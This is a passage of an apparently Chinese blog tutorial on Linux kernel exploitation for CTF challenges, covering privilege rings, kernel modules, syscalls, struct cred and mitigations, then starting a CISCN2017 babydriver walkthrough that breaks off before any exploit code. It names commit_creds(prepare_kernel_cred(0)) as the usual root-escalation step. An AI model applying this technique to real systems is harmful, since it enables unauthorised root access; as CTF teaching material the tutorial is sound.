<p>intel CPU 将 CPU 的特权级别分为 4 个级别：Ring 0, Ring 1, Ring 2, Ring 3。</p> <p>Ring0 只给 OS 使用，Ring 3 所有程序都可以使用，内层 Ring 可以随便使用外层 Ring 的资源。</p> <p>使用 Ring Model 是为了提升系统安全性，例如某个间谍软件作为一个在 Ring 3 运行的用户程序，在不通知用户的时候打开摄像头会被阻止，因为访问硬件需要使用being驱动程序保留的 Ring 1 的方法。</p> <p>大多数的现代操作系统只使用了 Ring 0 和 Ring 3。 <img src="http://ww1.sinaimg.cn/large/006AWYXBly1fvvb8k44kjj30rf0j2wke.jpg" alt=""></p> <h3 id="loadable-kernel-moduleslkms">Loadable Kernel Modules(LKMs)</h3> <p>可加载核心模块 (或直接称为内核模块) 就像运行在内核空间的可执行程序，包括:</p> <ul> <li>驱动程序（Device drivers）</li> <li>内核扩展模块 (modules)</li> </ul> <p><img src="http://ww1.sinaimg.cn/large/006AWYXBly1fvw9qhknaoj30ps0hkaev.jpg" alt=""></p> <p>LKMs 的文件格式和用户态的可执行程序相同，Linux 下为 ELF，Windows 下为 exe/dll，mac 下为 MACH-O，因此我们可以用 IDA 等工具来分析内核模块。</p> <p>模块可以被单独编译，但不能单独运行。它在运行时被链接到内核作为内核的一部分在内核空间运行，这与运行在用户控件的进程不同。</p> <p>模块通常用来实现一种文件系统、一个驱动程序或者其他内核上层的功能。</p> <blockquote> <p>Linux 内核之所以提供模块机制，是因为它本身是一个单内核 (monolithic kernel)。单内核的优点是效率高，因为所有的内容都集合在一起，但缺点是可扩展性和可维护性相对较差，模块机制就是为了弥补这一缺陷。</p> </blockquote> <h4 id="相关指令">相关指令</h4> <ul> <li><strong>insmod</strong>: 讲指定模块加载到内核中</li> <li><strong>rmmod</strong>: 从内核中卸载指定模块</li> <li><strong>lsmod</strong>: 列出已经加载的模块</li> </ul> <blockquote> <p>大多数　kernel vulnerability 也出在 LKM 中。</p> </blockquote> <h3 id="syscall">syscall</h3> <p>系统调用，指的是用户空间的程序向操作系统内核请求需要更高权限的服务，比如 IO 操作或者进程间通信。系统调用提供用户程序与操作系统间的接口，部分库函数（如 scanf，puts 等 IO 相关的函数实际上是对系统调用的封装 （read 和 write)）。</p> <blockquote> <p>在 <em>/usr/include/x86_64-linux-gnu/asm/unistd_64.h</em> 和 <em>/usr/include/x86_64-linux-gnu/asm/unistd_32.h</em> 分别可以查看 64 位和 32 位的系统调用号。</p> </blockquote> <blockquote> <p>推荐两个查阅系统调用号的网站</p> <p><a href="https://syscalls32.paolostivanin.com">syscall-32</a></p> <p><a href="https://syscalls64.paolostivanin.com">syscall-64</a></p> </blockquote> <h3 id="ioctl">ioctl</h3> <p>直接查看 man 手册</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-fallback" data-lang="fallback">NAME ioctl - control device SYNOPSIS #include &lt;sys/ioctl.h&gt; int ioctl(int fd, unsigned long request, ...); DESCRIPTION The ioctl() system call manipulates the underlying device parameters of special files. In particular, many operating characteristics of character special files (e.g., terminals) may be controlled with ioctl() requests. The argument fd must be an open file descriptor. The second argument is a device-dependent request code. The third argument is an untyped pointer to memory. It&#39;s traditionally char *argp (from the days before void * was valid C), and will be so named for this discussion. An ioctl() request has encoded in it whether the argument is an in parameter or out parameter, and the size of the argument argp in bytes. Macros and defines used in specifying an ioctl() request are located in the file &lt;sys/ioctl.h&gt;. </code></pre></td></tr></table> </div> </div><p>可以看出 ioctl 也是一个系统调用，用于与设备通信。</p> <p><code>int ioctl(int fd, unsigned long request, ...)</code> 的第一个参数为打开设备 (open) 返回的 <a href="http://m4x.fun/post/play-with-file-descriptor-1/">文件描述符</a>，第二个参数为用户程序对设备的控制命令，再后边的参数则是一些补充参数，与设备有关。</p> <blockquote> <p>使用 ioctl 进行通信的原因：</p> </blockquote> <blockquote> <p>操作系统提供了内核访问标准外部设备的系统调用，因为大多数硬件设备只能够在内核空间内直接寻址,但是当访问非标准硬件设备这些系统调用显得不合适,有时候用户模式可能需要直接访问设备。</p> </blockquote> <blockquote> <p>比如，一个系统管理员可能要修改网卡的配置。现代操作系统提供了各种各样设备的支持，有一些设备可能没有被内核设计者考虑到，如此一来提供一个这样的系统调用来使用设备就变得不可能了。</p> </blockquote> <blockquote> <p>为了解决这个问题，内核被设计成可扩展的，可以加入一个称为设备驱动的模块，驱动的代码允许在内核空间运行而且可以对设备直接寻址。一个Ioctl接口是一个独立的系统调用，通过它用户空间可以跟设备驱动沟通。对设备驱动的请求是一个以设备和请求号码为参数的Ioctl调用，如此内核就允许用户空间访问设备驱动进而访问设备而不需要了解具体的设备细节，同时也不需要一大堆针对不同设备的系统调用。</p> </blockquote> <h3 id="状态切换">状态切换</h3> <h4 id="user-space-to-kernel-space">user space to kernel space</h4> <p>当发生 <code>系统调用</code>，<code>产生异常</code>，<code>外设产生中断</code>等事件时，会发生用户态到内核态的切换，具体的过程为：</p> <ol> <li> <p>通过 <code>swapgs</code> 切换 GS 段寄存器，将 GS 寄存器值和一个特定位置的值进行交换，目的是保存 GS 值，同时将该位置的值作为内核执行时的 GS 值使用。</p> </li> <li> <p>将当前栈顶（用户空间栈顶）记录在 CPU 独占变量区域里，将 CPU 独占区域里记录的内核栈顶放入 rsp/esp。</p> </li> <li> <p>通过 push 保存各寄存器值，具体的 <a href="http://elixir.free-electrons.com/linux/v4.12/source/arch/x86/entry/entry_64.S">代码</a> 如下:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-asm" data-lang="asm"> <span class="nf">ENTRY</span><span class="p">(</span><span class="no">entry_SYSCALL_64</span><span class="p">)</span> <span class="err">/*</span> <span class="nf">SWAPGS_UNSAFE_STACK是一个宏</span><span class="err">，</span><span class="no">x86直接定义为swapgs指令</span> <span class="p">*</span><span class="err">/</span> <span class="nf">SWAPGS_UNSAFE_STACK</span> <span class="err">/*</span> <span class="err">保存栈值，并设置内核栈</span> <span class="err">*/</span> <span class="nf">movq</span> <span class="nv">%rsp</span><span class="p">,</span> <span class="no">PER_CPU_VAR</span><span class="p">(</span><span class="no">rsp_scratch</span><span class="p">)</span> <span class="nf">movq</span> <span class="no">PER_CPU_VAR</span><span class="p">(</span><span class="no">cpu_current_top_of_stack</span><span class="p">),</span> <span class="nv">%rsp</span> <span class="err">/*</span> <span class="err">通过</span><span class="nf">push保存寄存器值</span><span class="err">，形成一个</span><span class="no">pt_regs结构</span> <span class="p">*</span><span class="err">/</span> <span class="err">/*</span> <span class="nf">Construct</span> <span class="no">struct</span> <span class="no">pt_regs</span> <span class="no">on</span> <span class="no">stack</span> <span class="p">*</span><span class="err">/</span> <span class="nf">pushq</span> <span class="no">$__USER_DS</span> <span class="err">/</span><span class="p">*</span> <span class="no">pt_regs-</span><span class="err">&gt;</span><span class="no">ss</span> <span class="p">*</span><span class="err">/</span> <span class="nf">pushq</span> <span class="no">PER_CPU_VAR</span><span class="p">(</span><span class="no">rsp_scratch</span><span class="p">)</span> <span class="err">/</span><span class="p">*</span> <span class="no">pt_regs-</span><span class="err">&gt;</span><span class="no">sp</span> <span class="p">*</span><span class="err">/</span> <span class="nf">pushq</span> <span class="nv">%r11</span> <span class="err">/</span><span class="p">*</span> <span class="no">pt_regs-</span><span class="err">&gt;</span><span class="no">flags</span> <span class="p">*</span><span class="err">/</span> <span class="nf">pushq</span> <span class="no">$__USER_CS</span> <span class="err">/</span><span class="p">*</span> <span class="no">pt_regs-</span><span class="err">&gt;</span><span class="no">cs</span> <span class="p">*</span><span class="err">/</span> <span class="nf">pushq</span> <span class="nv">%rcx</span> <span class="err">/</span><span class="p">*</span> <span class="no">pt_regs-</span><span class="err">&gt;</span><span class="no">ip</span> <span class="p">*</span><span class="err">/</span> <span class="nf">pushq</span> <span class="nv">%rax</span> <span class="err">/</span><span class="p">*</span> <span class="no">pt_regs-</span><span class="err">&gt;</span><span class="no">orig_ax</span> <span class="p">*</span><span class="err">/</span> <span class="nf">pushq</span> <span class="nv">%rdi</span> <span class="err">/</span><span class="p">*</span> <span class="no">pt_regs-</span><span class="err">&gt;</span><span class="no">di</span> <span class="p">*</span><span class="err">/</span> <span class="nf">pushq</span> <span class="nv">%rsi</span> <span class="err">/</span><span class="p">*</span> <span class="no">pt_regs-</span><span class="err">&gt;</span><span class="no">si</span> <span class="p">*</span><span class="err">/</span> <span class="nf">pushq</span> <span class="nv">%rdx</span> <span class="err">/</span><span class="p">*</span> <span class="no">pt_regs-</span><span class="err">&gt;</span><span class="no">dx</span> <span class="p">*</span><span class="err">/</span> <span class="nf">pushq</span> <span class="nv">%rcx</span> <span class="no">tuichu</span> <span class="err">/</span><span class="p">*</span> <span class="no">pt_regs-</span><span class="err">&gt;</span><span class="no">cx</span> <span class="p">*</span><span class="err">/</span> <span class="nf">pushq</span> <span class="no">$-ENOSYS</span> <span class="err">/</span><span class="p">*</span> <span class="no">pt_regs-</span><span class="err">&gt;</span><span class="no">ax</span> <span class="p">*</span><span class="err">/</span> <span class="nf">pushq</span> <span class="nv">%r8</span> <span class="err">/</span><span class="p">*</span> <span class="no">pt_regs-</span><span class="err">&gt;</span><span class="no">r8</span> <span class="p">*</span><span class="err">/</span> <span class="nf">pushq</span> <span class="nv">%r9</span> <span class="err">/</span><span class="p">*</span> <span class="no">pt_regs-</span><span class="err">&gt;</span><span class="no">r9</span> <span class="p">*</span><span class="err">/</span> <span class="nf">pushq</span> <span class="nv">%r10</span> <span class="err">/</span><span class="p">*</span> <span class="no">pt_regs-</span><span class="err">&gt;</span><span class="no">r10</span> <span class="p">*</span><span class="err">/</span> <span class="nf">pushq</span> <span class="nv">%r11</span> <span class="err">/</span><span class="p">*</span> <span class="no">pt_regs-</span><span class="err">&gt;</span><span class="no">r11</span> <span class="p">*</span><span class="err">/</span> <span class="nf">sub</span> <span class="no">$</span><span class="p">(</span><span class="mi">6</span><span class="p">*</span><span class="mi">8</span><span class="p">),</span> <span class="nv">%rsp</span> <span class="err">/</span><span class="p">*</span> <span class="no">pt_regs-</span><span class="err">&gt;</span><span class="no">bp</span><span class="p">,</span> <span class="no">bx</span><span class="p">,</span> <span class="no">r12-15</span> <span class="no">not</span> <span class="no">saved</span> <span class="p">*</span><span class="err">/</span> </code></pre></td></tr></table> </div> </div><p>``</p> </li> <li> <p>通过汇编指令判断是否为 x32_abi。</p> </li> <li> <p>通过系统调用号，跳到全局变量 <code>sys_call_table</code> 相应位置继续执行系统调用。</p> </li> </ol> <h4 id="kernel-space-to-user-space">kernel space to user space</h4> <p>退出时，流程如下：</p> <ol> <li>通过 <code>swapgs</code> 恢复 GS 值</li> <li>通过 <code>sysretq</code> 或者 <code>iretq</code> 恢复到用户控件继续执行。如果使用 <code>iretq</code> 还需要给出用户空间的一些信息（CS, eflags/rflags, esp/rsp 等）</li> </ol> <h3 id="struct-cred">struct cred</h3> <p>之前提到 kernel 记录了进程的权限，更具体的，是用 cred 结构体记录的，每个进程中都有一个 cred 结构，这个结构保存了该进程的权限等信息（uid，gid 等），如果能修改某个进程的 cred，那么也就修改了这个进程的权限。</p> <p><a href="https://code.woboq.org/linux/linux/include/linux/cred.h.html#cred">源码</a> 如下:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-asm" data-lang="asm"><span class="nf">struct</span> <span class="no">cred</span> <span class="err">{</span> <span class="nf">atomic_t</span> <span class="no">usage</span><span class="c">; </span><span class="c">#ifdef CONFIG_DEBUG_CREDENTIALS </span><span class="c"></span> <span class="no">atomic_t</span> <span class="no">subscribers</span><span class="c">; /* number of processes subscribed */ </span><span class="c"></span> <span class="no">void</span> <span class="p">*</span><span class="no">put_addr</span><span class="c">; </span><span class="c"></span> <span class="no">unsigned</span> <span class="no">magic</span><span class="c">; </span><span class="c">#define CRED_MAGIC 0x43736564 </span><span class="c">#define CRED_MAGIC_DEAD 0x44656144 </span><span class="c">#endif </span><span class="c"></span> <span class="no">kuid_t</span> <span class="no">uid</span><span class="c">; /* real UID of the task */ </span><span class="c"></span> <span class="no">kgid_t</span> <span class="no">gid</span><span class="c">; /* real GID of the task */ </span><span class="c"></span> <span class="no">kuid_t</span> <span class="no">suid</span><span class="c">; /* saved UID of the task */ </span><span class="c"></span> <span class="no">kgid_t</span> <span class="no">sgid</span><span class="c">; /* saved GID of the task */ </span><span class="c"></span> <span class="no">kuid_t</span> <span class="no">euid</span><span class="c">; /* effective UID of the task */ </span><span class="c"></span> <span class="no">kgid_t</span> <span class="no">egid</span><span class="c">; /* effective GID of the task */ </span><span class="c"></span> <span class="no">kuid_t</span> <span class="no">fsuid</span><span class="c">; /* UID for VFS ops */ </span><span class="c"></span> <span class="no">kgid_t</span> <span class="no">fsgid</span><span class="c">; /* GID for VFS ops */ </span><span class="c"></span> <span class="no">unsigned</span> <span class="no">securebits</span><span class="c">; /* SUID-less security management */ </span><span class="c"></span> <span class="no">kernel_cap_t</span> <span class="no">cap_inheritable</span><span class="c">; /* caps our children can inherit */ </span><span class="c"></span> <span class="no">kernel_cap_t</span> <span class="no">cap_permitted</span><span class="c">; /* caps we&#39;re permitted */ </span><span class="c"></span> <span class="no">kernel_cap_t</span> <span class="no">cap_effective</span><span class="c">; /* caps we can actually use */ </span><span class="c"></span> <span class="no">kernel_cap_t</span> <span class="no">cap_bset</span><span class="c">; /* capability bounding set */ </span><span class="c"></span> <span class="no">kernel_cap_t</span> <span class="no">cap_ambient</span><span class="c">; /* Ambient capability set */ </span><span class="c">#ifdef CONFIG_KEYS </span><span class="c"></span> <span class="no">unsigned</span> <span class="no">char</span> <span class="no">jit_keyring</span><span class="c">; /* default keyring to attach requested </span><span class="c"></span> <span class="p">*</span> <span class="no">keys</span> <span class="no">to</span> <span class="p">*</span><span class="err">/</span> <span class="nf">struct</span> <span class="no">key</span> <span class="no">__rcu</span> <span class="p">*</span><span class="no">session_keyring</span><span class="c">; /* keyring inherited over fork */ </span><span class="c"></span> <span class="no">struct</span> <span class="no">key</span> <span class="p">*</span><span class="no">process_keyring</span><span class="c">; /* keyring private to this process */ </span><span class="c"></span> <span class="no">struct</span> <span class="no">key</span> <span class="p">*</span><span class="no">thread_keyring</span><span class="c">; /* keyring private to this thread */ </span><span class="c"></span> <span class="no">struct</span> <span class="no">key</span> <span class="p">*</span><span class="no">request_key_auth</span><span class="c">; /* assumed request_key authority */ </span><span class="c">#endif </span><span class="c">#ifdef CONFIG_SECURITY </span><span class="c"></span> <span class="no">void</span> <span class="p">*</span><span class="no">security</span><span class="c">; /* subjective LSM security */ </span><span class="c">#endif </span><span class="c"></span> <span class="no">struct</span> <span class="no">user_struct</span> <span class="p">*</span><span class="no">user</span><span class="c">; /* real user ID subscription */ </span><span class="c"></span> <span class="no">struct</span> <span class="no">user_namespace</span> <span class="p">*</span><span class="no">user_ns</span><span class="c">; /* user_ns the caps and keyrings are relative to. */ </span><span class="c"></span> <span class="no">struct</span> <span class="no">group_info</span> <span class="p">*</span><span class="no">group_info</span><span class="c">; /* supplementary groups for euid/fsgid */ </span><span class="c"></span> <span class="no">struct</span> <span class="no">rcu_head</span> <span class="no">rcu</span><span class="c">; /* RCU deletion hook */ </span><span class="c"></span><span class="err">}</span> <span class="no">__randomize_layout</span><span class="c">; </span></code></pre></td></tr></table> </div> </div><h3 id="内核态函数">内核态函数</h3> <p>相比用户态库函数，内核态的函数有了一些变化</p> <ul> <li>printf() -&gt; <strong>printk()</strong>，但需要注意的是 printk() 不一定会把内容显示到终端上，但一定在内核缓冲区里，可以通过 <code>dmesg</code> 查看效果</li> <li>memcpy() -&gt; <strong>copy_from_user()/copy_to_user()</strong> <ul> <li>copy_from_user() 实现了将用户空间的数据传送到内核空间</li> <li>copy_to_user() 实现了将内核空间的数据传送到用户空间</li> </ul> </li> <li>malloc() -&gt; <strong>kmalloc()</strong>，内核态的内存分配函数，和 malloc() 相似，但使用的是 <code>slab/slub 分配器</code></li> <li>free() -&gt; <strong>kfree()</strong>，同 kmalloc()</li> </ul> <p>另外要注意的是，<code>kernel 管理进程，因此 kernel 也记录了进程的权限</code>。kernel 中有两个可以方便的改变权限的函数：</p> <ul> <li>*<em>int commit_creds(struct cred <em>new)</em></em></li> <li><em><em>struct cred</em> prepare_kernel_cred(struct task_struct</em> daemon)**</li> </ul> <p>从函数名也可以看出，执行 <code>commit_creds(prepare_kernel_cred(0))</code> 即可获得 root 权限（root 的 uid，gid 均为 0）</p> <p>执行 <code>commit_creds(prepare_kernel_cred(0))</code> 也是最常用的提权手段，两个函数的地址都可以在 <code>/proc/kallsyms</code> 中查看（较老的内核版本中是 <code>/proc/ksyms</code>。</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">post sudo grep commit_creds /proc/kallsyms <span class="o">[</span>sudo<span class="o">]</span> m4x 的密码： ffffffffbb6af9e0 T commit_creds ffffffffbc7cb3d0 r __ksymtab_commit_creds ffffffffbc7f06fe r __kstrtab_commit_creds post sudo grep prepare_kernel_cred /proc/kallsyms ffffffffbb6afd90 T prepare_kernel_cred ffffffffbc7d4f20 r __ksymtab_prepare_kernel_cred ffffffffbc7f06b7 r __kstrtab_prepare_kernel_cred </code></pre></td></tr></table> </div> </div><blockquote> <p>一般情况下，/proc/kallsyms 的内容需要 root 权限才能查看</p> </blockquote> <h3 id="mitigation">Mitigation</h3> <blockquote> <p>canary, dep, PIE, RELRO 等保护与用户态原理和作用相同</p> </blockquote> <ul> <li> <p>smep: Supervisor Mode Execution Protection，当处理器处于 <code>ring0</code> 模式时，执行 <code>用户空间</code> 的代码会触发页错误。（在 arm 中该保护称为 <code>PXN</code>)</p> </li> <li> <p>smap: Superivisor Mode Access Protection，类似于 smep，通常是在访问数据时。</p> </li> <li> <p>mmap_min_addr:</p> </li> </ul> <h3 id="ctf-kernel-pwn-相关">CTF kernel pwn 相关</h3> <p>一般会给以下三个文件</p> <ol> <li> <p>boot.sh: 一个用于启动 kernel 的 shell 的脚本，多用 qemu，保护措施与 qemu 不同的启动参数有关</p> </li> <li> <p>bzImage: kernel binary</p> </li> <li> <p>rootfs.cpio: 文件系统映像</p> <p>比如：</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">CISCN2017_babydriver <span class="o">[</span>master●<span class="o">]</span> ls babydriver.tar CISCN2017_babydriver <span class="o">[</span>master●<span class="o">]</span> x babydriver.tar boot.sh bzImage rootfs.cpio CISCN2017_babydriver <span class="o">[</span>master●<span class="o">]</span> ls babydriver.tar boot.sh bzImage rootfs.cpio CISCN2017_babydriver <span class="o">[</span>master●<span class="o">]</span> file bzImage bzImage: Linux kernel x86 boot executable bzImage, version 4.4.72 <span class="o">(</span>atum@ubuntu<span class="o">)</span> <span class="c1">#1 SMP Thu Jun 15 19:52:50 PDT 2017, RO-rootFS, swap_dev 0x6, Normal VGA</span> CISCN2017_babydriver <span class="o">[</span>master●<span class="o">]</span> file rootfs.cpio rootfs.cpio: gzip compressed data, last modified: Tue Jul <span class="m">4</span> 08:39:15 2017, max compression, from Unix, original size <span class="m">2844672</span> CISCN2017_babydriver <span class="o">[</span>master●<span class="o">]</span> file boot.sh boot.sh: Bourne-Again shell script, ASCII text executable CISCN2017_babydriver <span class="o">[</span>master●<span class="o">]</span> bat boot.sh ───────┬───────────────────────────────────────────────────────────────────────────────── │ File: boot.sh ───────┼───────────────────────────────────────────────────────────────────────────────── <span class="m">1</span> │ <span class="c1">#!/bin/bash</span> <span class="m">2</span> │ <span class="m">3</span> │ qemu-system-x86_64 -initrd rootfs.cpio -kernel bzImage -append <span class="s1">&#39;console=ttyS0 ro </span><span class="s1"> │ ot=/dev/ram oops=panic panic=1&#39;</span> -enable-kvm -monitor /dev/null -m 64M --nographi │ c -smp <span class="nv">cores</span><span class="o">=</span>1,threads<span class="o">=</span><span class="m">1</span> -cpu kvm64,+smep ───────┴───────────────────────────────────────────────────────────────────────────────── </code></pre></td></tr></table> </div> </div><p>`` 解释一下 qemu 启动的参数：</p> <ul> <li>-initrd rootfs.cpio，使用 rootfs.cpio 作为内核启动的文件系统</li> <li>-kernel bzImage，使用 bzImage 作为 kernel 映像</li> <li>-cpu kvm64,+smep，设置 CPU 的安全选项，这里开启了 smep</li> <li>-m 64M，设置虚拟 RAM 为 64M，默认为 128M</li> </ul> <p>其他的选项可以通过 &ndash;help 查看。</p> </li> <li> <p>本地写好 exploit 后，可以通过 base64 编码等方式把编译好的二进制文件保存到远程目录下，进而拿到 flag</p> </li> </ol> <h2 id="example">Example</h2> <p>背景知识还有很多，会在分析例题的过程中逐步介绍。</p> <h3 id="kernel-uaf---ciscn2017---babydriver">kernel UAF - CISCN2017 - babydriver</h3> <p><a href="https://github.com/bash-c/pwn_repo/blob/master/CISCN2017_babydriver/babydriver.tar">attachment here</a></p> <h4 id="分析">分析</h4> <p>先解压 rootfs.cpio 看一下有什么文件</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">CISCN2017_babydriver <span class="o">[</span>master●<span class="o">]</span> mkdir core CISCN2017_babydriver <span class="o">[</span>master●<span class="o">]</span> <span class="nb">cd</span> core core <span class="o">[</span>master●<span class="o">]</span> mv ../rootfs.cpio rootfs.cpio.gz core <span class="o">[</span>master●●<span class="o">]</span> gunzip ./rootfs.cpio.gz core <span class="o">[</span>master●<span class="o">]</span> ls rootfs.cpio core <span class="o">[</span>master●<span class="o">]</span> cpio -idmv &lt; rootfs.cpio . etc etc/init.d etc/passwd etc/group ... ... usr/sbin/rdev usr/sbin/ether-wake tmp linuxrc home home/ctf <span class="m">5556</span> 块 core <span class="o">[</span>master●<span class="o">]</span> ls bin etc home init lib linuxrc proc rootfs.cpio sbin sys tmp usr core <span class="o">[</span>master●<span class="o">]</span> bat init ───────┬───────────────────────────────────────────────────────────────────────────────── │ File: init ───────┼───────────────────────────────────────────────────────────────────────────────── <span class="m">1</span> │ <span class="c1">#!/bin/sh</span> <span class="m">2</span> │ <span class="m">3</span> │ mount -t proc none /proc <span class="m">4</span> │ mount -t sysfs none /sys <span class="m">5</span> │ mount -t devtmpfs devtmpfs /dev <span class="m">6</span> │ chown root:root flag <span class="m">7</span> │ chmod <span class="m">400</span> flag <span class="m">8</span> │ <span class="nb">exec</span> 0&lt;/dev/console <span class="m">9</span> │ <span class="nb">exec</span> 1&gt;/dev/console <span class="m">10</span> │ <span class="nb">exec</span> 2&gt;/dev/console <span class="m">11</span> │ <span class="m">12</span> │ insmod /lib/modules/4.4.72/babydriver.ko <span class="m">13</span> │ chmod <span class="m">777</span> /dev/babydev <span class="m">14</span> │ <span class="nb">echo</span> -e <span class="s2">&#34;\nBoot took </span><span class="k">$(</span>cut -d<span class="s1">&#39; &#39;</span> -f1 /proc/uptime<span class="k">)</span><span class="s2"> seconds\n&#34;</span> <span class="m">15</span> │ setsid cttyhack setuidgid <span class="m">1000</span> sh <span class="m">16</span> │ <span class="m">17</span> │ umount /proc <span class="m">18</span> │ umount /sys <span class="m">19</span> │ poweroff -d <span class="m">0</span> -f <span class="m">20</span> │ ───────┴──────────────────────────────────────────────────────────── </code></pre></td></tr></table> </div> </div><p>根据 init 的内容，12 行加载了 <code>babydriver.ko</code> 这个驱动，根据 pwn 的一般套路，这个就是有漏洞的 LKM 了。init 的其他命令都是 linux 常用的命令，就不再解释了。</p> <p>把这个驱动文件拿出来。</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">core <span class="o">[</span>master●<span class="o">]</span> cp ./lib/modules/4.4.72/babydriver.ko .. core <span class="o">[</span>master●<span class="o">]</span> <span class="nb">cd</span> .. CISCN2017_babydriver <span class="o">[</span>master●<span class="o">]</span> check ./babydriver.ko ./babydriver.ko: ELF 64-bit LSB relocatable, x86-64, version <span class="m">1</span> <span class="o">(</span>SYSV<span class="o">)</span>, BuildID<span class="o">[</span>sha1<span class="o">]=</span>8ec63f63d3d3b4214950edacf9e65ad76e0e00e7, with debug_info, not stripped <span class="o">[</span>*<span class="o">]</span> <span class="s1">&#39;/home/m4x/pwn_repo/CISCN2017_babydriver/babydriver.ko&#39;</span> Arch: amd64-64-little RELRO: No RELRO Stack: No canary found NX: NX enabled PIE: No PIE <span class="o">(</span>0x0<span class="o">)</span> </code></pre></td></tr></table> </div> </div><p>没有开 PIE，无 canary 保护，没有去除符号表，很 nice。</p> <p>用 IDA 打开分析，既然没有去除符号表，shift + F9 先看一下有什么结构体，可以发现如下的结构体：</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 